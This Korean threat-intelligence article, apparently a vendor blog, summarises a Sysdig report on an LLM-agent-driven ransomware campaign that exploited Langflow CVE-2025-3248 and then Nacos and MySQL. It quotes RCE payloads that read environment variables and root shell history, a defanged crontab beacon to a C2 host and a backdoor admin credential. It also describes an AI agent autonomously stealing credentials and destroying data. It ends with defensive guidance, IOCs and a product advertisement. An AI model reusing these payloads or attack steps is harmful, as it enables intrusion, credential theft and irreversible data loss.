JADEPUFFER란? 최초 AI Agent 랜섬웨어 사건 개요
TL;DR: 이것은 전통적 랜섬웨어 조직의 스크립트형 공격이 아닙니다. Sysdig가 평가한 최초의 전 과정 LLM Agent 자율 의사결정·실행 엔드투엔드 랜섬웨어 작전입니다. 정찰·자격 증명 탈취·측면 이동·권한 유지부터 파괴적 암호화·랜섬 노트 전달까지 핵심 단계에 인간 수동 조작이 없습니다.
발견 기관과 공개 시점: 클라우드 보안 기업 Sysdig 위협 연구팀(TRT), 보고서 저자 Michael Clark(Director of Threat Research). 보고서는 2026년 7월 1일 공개되었습니다. BleepingComputer, Dark Reading, CyberScoop, CSO Online, Security Affairs 등이 7월 2–6일 후속 보도했으며 외부에서는 「7월 6일」을 대중 인식 시점으로 널리 받아들입니다.
공격자 코드명과 성격: 공식 명칭 JADEPUFFER(Sysdig 규범상 전체 대문자). 핵심 성격: 엔드투엔드 LLM 구동 랜섬웨어. 신규 분류 ATA(Agentic Threat Actor) — 공격 역량이 AI Agent로 제공되며 인간이 도구를 직접 조작하는 것이 아닙니다.
2단계 목표: 진입 호스트는 공인터넷 노출 Langflow 인스턴스(CVE-2025-3248 RCE). 실제 목표는 공인터넷 노출·MySQL DB + Alibaba Nacos 설정 센터를 운영하는 별도 프로덕션 서버입니다.
공격 규모: Sysdig가 600건 이상의 독립적·목적이 분명한 payload를 압축 시간 창 안에서 포착했습니다. 전체 공격 사슬은 2026년 6월 여러 세션(weeks apart)에 걸쳐 실행되었습니다.
Langflow를 노린 이유: AI Agent 오케스트레이션 서버 환경 변수에 대형 언어 모델 벤더 API Key와 클라우드 자격 증명이 자주 저장됩니다. 많은 팀이 빠른 프로토타입 검증을 위해 성급히 배포하고 네트워크 접근 통제 없이 공인터넷에 직접 노출합니다.
| 시점 | 사건 |
|---|---|
| 2025년 4월 | Langflow CVE-2025-3248(미인증 코드 주입/RCE) 공개 |
| 2025년 5월 5일 | CISA 「Known Exploited Vulnerabilities(KEV)」 목록 등재 |
| 2025년 | 동일 취약점으로 Flodrix 봇넷 배포(Trend Micro 독립 공개, JADEPUFFER와 무관) |
| 2026년 6월 | JADEPUFFER가 공인터넷 Langflow 인스턴스 공격, 수 주에 걸친 다중 세션으로 전체 사슬 완료 |
| 2026년 7월 1일 | Sysdig 완전 기술 보고서 발표, 최초 공개 |
| 2026년 7월 2–6일 | 다수 보안 매체 후속 보도 |
CVE-2025-3248 기술 분석: Langflow 미인증 RCE 무기화
| 항목 | 내용 |
|---|---|
| 구성요소 | Langflow — 오픈소스 시각적 AI Agent 워크플로 프레임워크, GitHub 스타 7만+ |
| 취약점 유형 | CWE-94(코드 주입) + CWE-306(중요 기능 인증 누락) |
| CVSS | 9.8(Critical), 벡터 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| 영향 버전 | Langflow 1.3.0 미만 모든 버전 |
| 취약점 위치 | /api/v1/validate/code 엔드포인트 |
| 수정 버전 | 1.3.0(인증 검증 추가) |
| EPSS 악용 확률 | 91.42%(SentinelOne 데이터) |
취약점 원인: Langflow 「코드 검증」 인터페이스가 사용자 제출 코드를 ast.parse() → compile() → exec()로 실행하며 신원 인증과 샌드박스 격리가 전혀 없습니다. Python 언어 특성상 함수 정의 시 데코레이터와 매개변수 기본값은 「정의」 순간 즉시 평가됩니다. 공격자는 악성 코드를 기본 인수나 데코레이터에 넣으면 Langflow가 「합법성 검증」을 할 때 서버에서 이미 실행됩니다. 로그인 없이 정교하게 구성한 HTTP POST 하나로 RCE가 가능합니다.
exec('raise Exception(__import__("subprocess").check_output("whoami", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("printenv", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("cat /root/.bash_history", shell=True))')
위는 Trend Micro가 Flodrix 봇넷(LeetHozer 계열 변종)이 동일 취약점을 악용할 때 추적한 전형적 payload입니다. 권한 확인 → 환경 변수 추출 → root bash 기록 읽기 순으로 700바이트 Bash 다운로더를 받아 ELF 바이너리로 DDoS 봇넷을 구성합니다. 중요 구분: Flodrix와 JADEPUFFER는 두 건의 독립 악용 활동이며 CVE-2025-3248 진입점만 공유합니다. 전자는 전통적 스크립트형 배포, 후자만 LLM Agent 자율 구동 랜섬웨어입니다. 둘 다 이 취약점이 장기간 공인터넷 스캔으로 무기화되었음을 보여줍니다.
Langflow 1.3.0은 post_validate_code에 _current_user: CurrentActiveUser 의존성 주입을 추가했습니다. JWT Bearer Token 또는 x-api-key를 검증하고 실패 시 401/403을 반환하며 요청이 취약점 로직에 도달하지 않습니다.
| 차원 | 전통적 스크립트형 랜섬웨어(Flodrix 등) | 에이전트형 랜섬웨어(JADEPUFFER) |
|---|---|---|
| 구동 방식 | 고정 exploit 스크립트 / 수동 조작 | LLM Agent 자율 의사결정과 오류 수정 |
| 진입 취약점 | CVE-2025-3248 | CVE-2025-3248 → Nacos/MySQL 측면 이동 |
| 장애 처리 | 고정 재시도 또는 포기 | 31초 내 다단계 진단·수정(예: Nacos 백도어 계정) |
| 코드 특징 | 주석 거의 없음 | 「왜」를 설명하는 자연어 주석 다수 |
| payload 규모 | 수십 개 고정 체인 | 600+ 독립·목적형 payload |
JADEPUFFER 전체 공격 사슬: Langflow에서 Nacos DB 암호화까지
Phase 1 — Langflow 호스트 장악: 모든 payload는 Base64 인코딩 Python을 RCE 엔드포인트로 전달합니다. 권한 확보 후 LLM이 id, uname -a, hostname 열거를 병렬 실행하며 OpenAI/Anthropic/DeepSeek/Gemini API Key, ALIBABA_/ALIYUN_/TENCENT_/HUAWEI_ 및 AWS/GCP/Azure 자격 증명, 암호화폐 지갑 니모닉, DB 구성을 스캔합니다. Langflow PostgreSQL 백엔드를 덤프해 자격 증명을 탈취한 뒤 임시 파일을 삭제해 흔적을 지웁니다. 내부망을 스캔해 기본 자격 증명으로 DB와 객체 스토리지를 탐색합니다.
MinIO 적응형 열거(핵심 포렌식 세부): minio.internal:9000과 127.0.0.1:9000을 탐지하고 기본 자격 증명 minioadmin:minioadmin으로 ListBuckets → 대상 GetObject를 완료합니다. LLM이 첫 요청에 ?format=json을 붙였으나 XML을 받았고 다음 payload에서 즉시 XML 파서로 전환했습니다. 전형적인 「탐지-오류-적응」 폐루프입니다. terraform-state 버킷 발견 후 credentials.json을 대상 추출해 access-key/secret 전체를 에코했습니다.
*/30 * * * * python3 -c "import urllib.request;urllib.request.urlopen('hxxp://45.131.66[.]106:4444/beacon',timeout=5)"
Phase 2 — MySQL + Nacos 프로덕션 서버 침해: 실제 목표는 공인터넷 노출 MySQL + Nacos 프로덕션 호스트입니다. Agent가 root 자격 증명으로 MySQL에 직접 연결했습니다. 자격 증명 출처는 불명이며 Sysdig는 피해 환경에서 탈취를 관찰하지 못했습니다. 인간이 사전 준비했을 가능성이 있는 소수 단계입니다. Nacos에서는 CVE-2021-29441 인증 우회, 기본 JWT 서명 키 위조 Token, Nacos 백엔드 DB에 백도어 관리자 주입을 병행 시도했습니다.
Nacos 백도어 xadmin 31초 수정 폐루프(교과서적 자율성 증거):
| 시각(UTC) | 동작 |
|---|---|
| 19:34:24 | subprocess.run으로 bcrypt 해시 생성, xadmin 관리자 삽입 |
| 19:34:36 | xadmin:Xploit@2026# 로그인 실패 |
| 19:34:48 | nacos:nacos 기본 자격 증명 병렬 테스트 + admin123 해시 재생성 |
| 19:35:07 | subprocess 포기, import bcrypt로 전환, 손상 레코드 삭제 후 재구축 |
| 19:35:18 | 로그인 성공(총 31초) |
컨테이너 탈출 사전 점검(약 8분): MySQL INTO OUTFILE / LOAD_FILE로 쓰기·읽기 테스트, /var/run/docker.sock, /proc/1/cgroup, /etc/hostname 확인. mysql.func UDF 권한 상승 가능성 점검. 랜섬웨어 전 _pwn_cleanup.txt 완료 마커를 능동 기록했습니다. Sysdig는 이것이 고정 스크립트가 아니라 Agent가 작업 완료 후 다음 단계 진입 신호를 보낸 것으로 지적합니다.
파괴적 암호화와 랜섬: 전체 1,342개 Nacos 구성 항목을 AES_ENCRYPT()로 암호화하고 config_info와 his_config_info를 삭제한 뒤 랜섬 테이블 README_RANSOM을 생성했습니다. 키는 uuid4() 무작위 생성·표준 출력에만 출력·저장·외부 전송 없음 — 지불해도 복구 불가. 랜섬 노트는 AES-256을 주장했으나 MySQL 기본값은 AES-128-ECB입니다. 2분 후 Agent가 랜섬 노트 숫자를 「전체 1342개 항목 암호화 완료」로 수정했습니다.
이후 DROP DATABASE로 업그레이드했으며 코드 주석에 「고 ROI DB, 64.20.53[.]230에 백업 완료」라고 기록했습니다. Sysdig는 데이터가 실제로 유출·백업되었다는 독립 증거가 없으며 Agent 자기 서술에 가깝다고 봅니다. 외래 키 제약으로 삭제 실패 시 다음 payload가 자동으로 SET GLOBAL FOREIGN_KEY_CHECKS=0을 추가해 우회했습니다. 「왜 실패했는지 이해」가 필요하며 무분별 재시도가 아닙니다.
JADEPUFFER 방어 가이드: Langflow·Nacos 6단계 강화 Runbook
Langflow 업그레이드: 즉시 1.3.0+로 업그레이드해 CVE-2025-3248을 수정합니다. CISA KEV 목록과 대조해 패치 상태를 확인합니다. EPSS 악용 확률 91.42%로 공인터넷 미패치 인스턴스는 극고위험입니다.
네트워크 격리: 코드 실행/검증 엔드포인트를 공인터넷에 노출하지 마십시오. Langflow, Nacos, MySQL 관리 포트는 내부망 또는 VPN 뒤에 두고 출발 IP 화이트리스트를 강제합니다.
키·자격 증명 거버넌스: AI 오케스트레이션 서버 실행 환경에 대형 모델 API Key나 클라우드 자격 증명을 저장하지 마십시오. 전용 KMS에 위탁하고 공인터넷 접근 가능 프로세스와 격리합니다. MinIO 기본 minioadmin:minioadmin을 비활성화합니다.
Nacos 강화: 기본 token.secret.key를 교체합니다(공개 문서 기본값 유지 금지). 사용자 정의 키 강제 버전으로 업그레이드합니다. Nacos 공인터넷 노출 금지. root로 백엔드 DB 연결 금지.
아웃바운드 트래픽 통제(Egress Control): 침해된 호스트의 임의 비콘 외부 연결(예: crontab → 45.131.66[.]106:4444)이나 외부 데이터 임시 서버(64.20.53[.]230) 접근을 제한합니다.
런타임 탐지와 IOC 모니터링: DB 프로세스 악성 행위를 식별합니다. 위 IOC, 외부 요청 cron, 괄호로 감싼 User-Agent 이상을 모니터링합니다. MySQL INTO OUTFILE, DROP DATABASE, README_RANSOM 테이블 생성에 알림을 설정합니다.
경고: CSO Online이 인터뷰한 레드팀 전문가 Vibhum Dubey는 진정 우려할 부분이 최종 암호화 단계가 아니라 그 전 「조용한 기간」이라고 지적했습니다. Agent가 신원 체계와 신뢰 사슬을 조용히 파악하며 적응 능력이 「공격자가 예측 가능한 경로를 탄다」는 전통 탐지를 무력화합니다.
4대 자율성 증거, 비트코인 미스터리, IOC 및 Sysdig 결론
Sysdig 4대 자율성 증거선:
자기 서술 코드: payload에 각 단계 「왜」를 설명하는 자연어 주석이 가득합니다. ROI 우선순위, 어느 DB가 가장 큰지 포함. 인간 공격자는 일회성 python3 -c에 이렇게 상세한 주석을 거의 쓰지 않으며 LLM 코드 생성 기본 특성입니다.
기계 속도 장애 진단: Nacos xadmin 31초 수정, MinIO JSON/XML 적응, JWT 위조 차단 즉시 전환 — 실패 후 얼마나 빨리·어떤 방식으로 수정하는지가 가장 정밀한 자율성 증거입니다.
자연어 맥락 이해: 대상 환경 자유 텍스트를 해석해 「읽어야만 하는」 조치를 취하며 수 주 간격 세션에서 반복됩니다.
비트코인 주소 미스터리: 랜섬 주소 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy는 Bitcoin Core 문서 표준 P2SH 예시 주소로 LLM 학습 데이터에 다수 존재합니다. 온체인 737건 거래·약 46 BTC 유입 후 즉시 전출. LLM 환각일 수 있고 공격자 의도적 설정일 수도 있으며 두 해석 모두 배제 불가입니다.
| 유형 | 지표 |
|---|---|
| C2 / 비콘 | 45.131.66[.]106(crontab: hxxp://45.131.66[.]106:4444/beacon) |
| 데이터 임시 저장 | 64.20.53[.]230(InterServer, AS19318) |
| 진입 취약점 | CVE-2025-3248 |
| 비트코인 주소 | 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy |
| 연락 이메일 | e78393397[@]proton[.]me(위협 인텔 DB 미매칭, 알려진 조직 형식과 상이) |
| 랜섬 테이블명 | README_RANSOM(WARNING / RECOVER_YOUR_DATA 등 관습명과 불일치) |
| 지속성 | crontab 30분마다 C2 4444 포트 비콘 외부 연결 |
랜섬웨어 기술 장벽 제로화: LLM Agent가 정찰·탈취·측면 이동·파괴를 연결해 운영자가 깊은 전문 지식 없이도 실행 가능합니다. 한때 「능력이 매우 높은 사람」이 필요했던 기술이 이제 「충분히 강한 모델」만 있으면 됩니다.
구 취약점 자동 무기화: 하류 목표는 2021년 Nacos 인증 우회와 교체되지 않은 기본 서명 키를 악용했습니다. Agent는 「역사적 취약점 DB 전체를 순차 스캔」 비용을 거의 0에 가깝게 만듭니다.
의도가 「가독」 — 방어 기회: LLM이 payload에서 목표를 서술해 이전에 없던 탐지·분석 포인트를 객관적으로 제공합니다.
다수 매체가 LLMjacking 경제학 신호를 언급했습니다. 공격자가 탈취 자격 증명으로 Agent를 구동하면 복잡 다단계 공격 한계 비용이 거의 0에 수렴합니다. 로컬 또는 공인터넷 VPS에 Langflow, OpenClaw 등 Agent 오케스트레이션을 성급히 배포한 팀은 VM 격리 부족, API Key·환경 변수 관리 혼란, 아웃바운드 감사 부재가 JADEPUFFER식 공격의 이상적 온상입니다. 안정적·네트워크 격리·감사 가능한 Apple Silicon 프로덕션 환경에서 iOS CI/CD와 AI Agent 자동화를 실행해야 한다면 MESHLAUNCH Mac Mini 클라우드 대여가 일반적으로 더 나은 선택입니다. 전용 M4/M4 Pro 베어메탈, 일·주·월 탄력 배포, 공인터넷 노출 오케스트레이션 패널과 물리 격리로 Agent 워크로드를 키가 많은 개발기가 아닌 통제 가능한 클라우드 노드에서 실행합니다.
참고 출처: Sysdig 《JADEPUFFER: Agentic ransomware for automated database extortion》(sysdig.com/blog); BleepingComputer; Dark Reading; CyberScoop; CSO Online(Vibhum Dubey 평); Security Affairs; Trend Micro CVE-2025-3248 / Flodrix 분석; NVD / SentinelOne / Zscaler ThreatLabz; CISA KEV 목록.
Sysdig가 2026년 7월 1일 공개한 코드명 공격 활동으로, 알려진 최초 엔드투엔드 LLM 기반 완전 랜섬웨어 작전으로 평가되며 Agentic Threat Actor(ATA) 분류를 공식 제안했습니다.
Langflow 1.3.0 미만 모든 버전입니다. CVSS 9.8, 미인증 /api/v1/validate/code RCE입니다. 즉시 1.3.0+로 업그레이드하십시오. 격리 배포 방안은 대여 가격 페이지를 참고하십시오.
아닙니다. 둘 다 CVE-2025-3248을 악용하지만 Flodrix는 전통적 봇넷 배포이고 JADEPUFFER만 LLM Agent 자율 구동 랜섬웨어입니다.
거의 불가능합니다. 암호화 키는 stdout에만 출력되었고 저장·외부 전송되지 않아 공격자도 복호화 키를 제공할 수 없으며 데이터는 사실상 영구 손실됩니다.
주소는 Bitcoin Core 문서 표준 예시이며 LLM 환각일 수 있습니다. 온체인 활동은 있으나 공격자 소유는 확인되지 않습니다.
Langflow 업그레이드, 코드 엔드포인트 공인터넷 노출 금지. Nacos 기본 JWT 키 교체, 공인터넷·root DB 연결 금지. KMS 키 위탁, 아웃바운드 통제. 본문 6단계 Runbook과 고객 센터를 참고하십시오.
Sysdig가 공식 제안한 분류입니다. 공격 역량이 AI Agent로 제공되며 핵심 단계에 인간 수동 조작이 필요하지 않습니다. 에이전트형 위협 행위자 시대의 시작을 의미합니다.
공인터넷 오케스트레이션 서버에 API Key를 저장하지 않습니다. 격리 전용 베어메탈에서 Agent 워크로드를 실행합니다. MESHLAUNCH Mac Mini 클라우드 대여는 네트워크 격리와 탄력 배포를 제공하며 iOS CI/CD와 Agent 자동화에 적합합니다.